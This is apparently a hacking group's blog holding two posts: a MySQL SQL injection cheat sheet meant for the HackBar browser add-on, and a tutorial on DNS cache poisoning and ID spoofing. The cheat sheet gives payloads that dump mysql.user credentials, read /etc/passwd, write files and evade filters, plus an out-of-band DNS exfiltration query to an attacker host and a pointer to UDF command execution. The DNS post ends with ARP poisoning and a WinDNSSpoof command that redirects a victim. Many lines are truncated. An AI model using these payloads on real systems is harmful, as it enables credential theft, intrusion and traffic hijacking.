SQL INJECTION Queries PART-2

22:21 ---

Hello ! Readers

"SQL INJECTION Queries"

[THIS Queries CAN BE USED IN HACKBAR ADDON FIREFOX.]

Version:

SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os

Directories:

SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir

Users:

SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()
Current Database:
SELECT DATABASE()
Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
Multi-Concat:
#Stacks the row "foo" from the table "bar" together, using the separa
#Note: This operation can by default only grab 1024 bytes, and do no
#The 1024 byte limit is stored in the @@group_concat_max_len variabl
SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar

Better-Concat:

#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
#Which therefor allows you to concat strings together up to the @@ma
#instead of @@group_concat_max_len. The default value for @@max_allo
#1048576 bytes, instead of @@group_concat_max_len's 1024.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
Change Collation:
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
Regular Expression in SELECT(s):
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
SELECT Without Dublicates:
SELECT DISTINCT foo FROM bar
Counting Columns:
SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
Get Amount of MySQL Users:
SELECT COUNT(user) FROM mysql.user

Get MySQL Users:

SELECT user FROM mysql.user
Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us

Get MySQL User Privileges on Different Databases:

SELECT grantee,table_schema,privilege_type FROM information_schema.sc

Get MySQL User Privileges on Different Columns:

SELECT table_schema,table_name,column_name,privilege_type FROM information.schema

Get MySQL User Credentials & Privileges:

SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
Repl_client_priv) FROM mysql.user
Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us
SELECT host,user FROM mysql.user WHERE Super_priv='Y'

Get Databases:

SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT db FROM mysql.db
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables
Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.colu
Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.c
SELECT A Certain Row:
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
...
SELECT foo FROM bar LIMIT N,1; #Returns row N.
Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" for 10000 times.
SELECT BENCHMARK(10000,MD5(1))
Sleep:
#Works only in MySQL 5 and above.
#Sleeps for 5 seconds, returns 0 on success.
SELECT SLEEP(5)
Conversion (Casting):
SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
SELECT CAST('65' AS CHAR); #Returns: A
Substring:
SELECT SUBSTR('foobar',1,3); #Returns: foo
Hexadecimal Evasion:
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :
ASCII to Number:
SELECT ASCII('A'); #Returns: 65
Number to ASCII:
SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test
If Statement:
#Returns 1 if the database is running MySQL 5.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
#Returns 1 if the database is running MySQL 4.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
Case Statement:
#Returns 1 if the database is running MySQL 5.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
#Returns 1 if the database is running MySQL 4.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
Read File(s):
#Requires you to have the File_priv in mysql.user. On error this stat
SELECT LOAD_FILE('/etc/passwd')
Write File(s):
#You must use quotes on the filename!
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
Logical Operator(s):
AND, &&; #The AND operator have && as an alternative syntax.
OR, ||;  #The OR operator have || as an alternative syntax.
NOT, !; #The NOT operator have ! as an alternative syntax.
XOR; #The XOR operator got no alternative syntax.
Fuzzy Code Comment:
#Code within /*! are getting executed by MySQL. Additional /*! can be
SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
Comments:
SELECT foo, bar FROM foo.bar-- Single line comment
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carrier Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parenthesis, ( and ); #Can also be used as separators when used right
Parenthesis instead of space:
#As said two lines above, the use of parenthesis can be used as a sep
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
DNS Requests (OOB (Out-Of-Band)):
#For more information check this.
SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS comman
#It can be done if you're able to upload a shared object into /usr/
#The file extension is .so, and it must contain an "User Defined Fun
#Get raptor_udf.c, it's the source-code for just that feature.
#Remember to compile it for the right CPU Architecture.
#The CPU architecture can be resolved by this query:
SELECT @@version_machine;
<blockquote>A couple of useful blind queries to fingerprint the data
All of these return either True or False, as in, you either get a res
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1
Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1
Can MySQL Sleep:
#This query will return True and should take above 1 second to execut
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
Do a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
Do a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
Do a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db

more queries comming soon

#Indian_Elite_Hackers

DNS Spoofing PART-II

08:40 ---

Hey !
We are Back
As we promised that we make some new tutorial on DNS Spoofing.

Now Start

What is DNS Spoofing ?

DNS Spoofing is the art of making a DNS entry to point to an another IP
than it would be supposed to point to. To understand better, let's see
an example.You're on your web browser and wish to see the news on
www.cnn.com, without to think of it, you just enter this URL in your
address bar and press enter.
Now, what's happening behind the scenes
? Well... basically, your browser is going to send a request to a DNS
Server to get the matching IP address for www.cnn.com, then the DNS
server tells your browser the IP address of CNN, so your browser to
connect to CNN's IP address and display the content of the main page.
Hold
on a minute... You get a message saying that CNN's web site has closed
because they don't have anymore money to pay for their web site. You're
so amazed, you call and tell that to your best friend on the phone, of
course he's laughing at you, but to be sure, he goes to CNN web site to
check by himself.
You are surprised when he tells you he can see the
news of the day as usual and you start to wonder what's going on. Are
you sure you are talking to the good IP address ?Let's check. You ask
your friend to fire up his favorite DNS resolving tool and to give you
the IP address he's getting for www.cnn.com.Once you got it, you put it
in your browser URL bar :

http://212.153.32.65

You feel ridiculous and frustrated when you see CNN's web page with its
daily news.
Well
you've just been the witness of a DNS hijacking scenario. You're
wondering what happened, did the DNS Server told you the wrong IP
address ? Maybe... At least this is the most obvious answer coming to
our mind.
In fact there are two techniques for accomplishing this DNS hijacking.
Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

As
you can imagine, a DNS server can't store information about all
existing names/IP on the net in its own memory space.That's why DNS
server have a cache, it enables them to keep a DNS record for a while.
In
fact, A DNS Server has the records only for the machines of the domain
it has the authority, if it needs to know about machines out of his
domain, it has to send a request to the DNS Server which handles these
machines and since it doesn't want to ask all the time about records,
it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS Server.
An
attacker his running is own domain (attacker.net) with his own hacked
DNS Server(ns.attacker.net) . Note that I said hacked DNS Server
because the attacker customized the records in his own DNS server, for
instance one record could be www.cnn.com=81.81.81.81
1) The attacker sends a request to your DNS Server asking it to resolve
www.attacker.net
2) Your DNS Server is not aware of this machine IP address, it doesn't
belongs to his domain, so it needs to asks to the responsible name
server.
3) The hacked DNS Server is replying to your DNS server,
and at the same time, giving all his records (including his record
concerning www.cnn.com) Note : this process is called a zone transfer.
4) The DNS server is not "poisoned".The attacker got his IP, but who
cares, his goal was not to get the IP address of his web server but to
force a zone transfer and make your DNS server poisoned as long as the
cache will not be cleared or updated.
5) Now if you ask your DNS
server, about www.cnn.com IP address it will give you 172.50.50.50,
where the attacker run his own web server. Or even simple, the attacker
could just run a bouncer forwarding all packets to the real web site
and vice versa,so you would see the real web site, but all your traffic
would be passing through the attacker's web site.

2) DNS ID Spoofing

We
saw that when a machine X wants to communicate with a machine Y, the
former always needs the latter IP address. However in most of cases, X
only has the name of Y, in that case, the DNS protocol is used to
resolve the name of Y into its IP address.
Therefore, a DNS request
is sent to a DNS Server declared at X, asking for the IP address of the
machine Y. Meanwhile, the machine X assigned a pseudo random
identification number to its request which should be present in the
answer from the DNS server.Then when the answer from the DNS server
will be received by X, it will just have to compare both numbers if
they're the same, in this case, the answer is taken as valid,otherwise
it will be simply ignored by X.
Does this concept is safe ? Not
completely. Anyone could lead an attack getting this ID number. If
you're for example on LAN, someone who runs a sniffer could intercept
DNS requests on the fly, see the request ID number and send you a fake
reply with the correct ID number... but with the IP address of his
choice.Then, without to realize it, the machine X will be talking to
the IP of attacker's choice thinking it's Y.

By the way, the DNS
protocol relies on UDP for requests (TCP is used only for zone
transfers), which means that it is easy to send a packet coming from a
fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't
provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplish this attack.
In
my example above, the attacker runs a sniffer, intercept the ID number
and replies to his victim with the same ID number and with a reply of
his choice.
In the other hand, even if the attacker intercepted your
request, it will be transmitted to the DNS Server anyway which will
also reply to the request(unless the attacker is blocking the request
at the gateway or carry out ARP cache poisoning which would make the
attack possible on a switched network by the way).
That means that
the attacker has to reply BEFORE the real DNS server, which means that
to succeed this attack, the attacker MUST be on the same LAN so to have
a very quick ping to your machine, and also to be able to capture your
packets.

Practical example ( for
testing purposes ONLY)
To see yourself how to hijack a connection from a machine on your local
area network,we can do the followings :

First step :Poison the ARP cache of the victim's machine (tools and explanations
for realizing this task can be found at http://www.arp-sk.org)

Second step :Now, outgoing packets of the target will be redirected to your host,but
you have to forward the traffic to the real gateway, this can be
achieved witha tool like Winroute Pro.
Third step :We then use WinDNSSpoof,
developed by valgasu (www.securiteinfo.org)
which isa tool that greatly help to carry out DNS ID Spoofing. (Before
to use this tool be sure you have the Winpcap library installed on your
machine, see http://winpcap.polito.it).We
run it in the cmd like :

wds -n www.cnn.com -i 123.123.123.123 -g 00-C0-26-DD-59-CF -v

This
will make www.cnn.com to point to 123.123.123.123 on the victim's
machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS
server.

-----------------------
|#Indian_Elite_Hackers|
-----------------------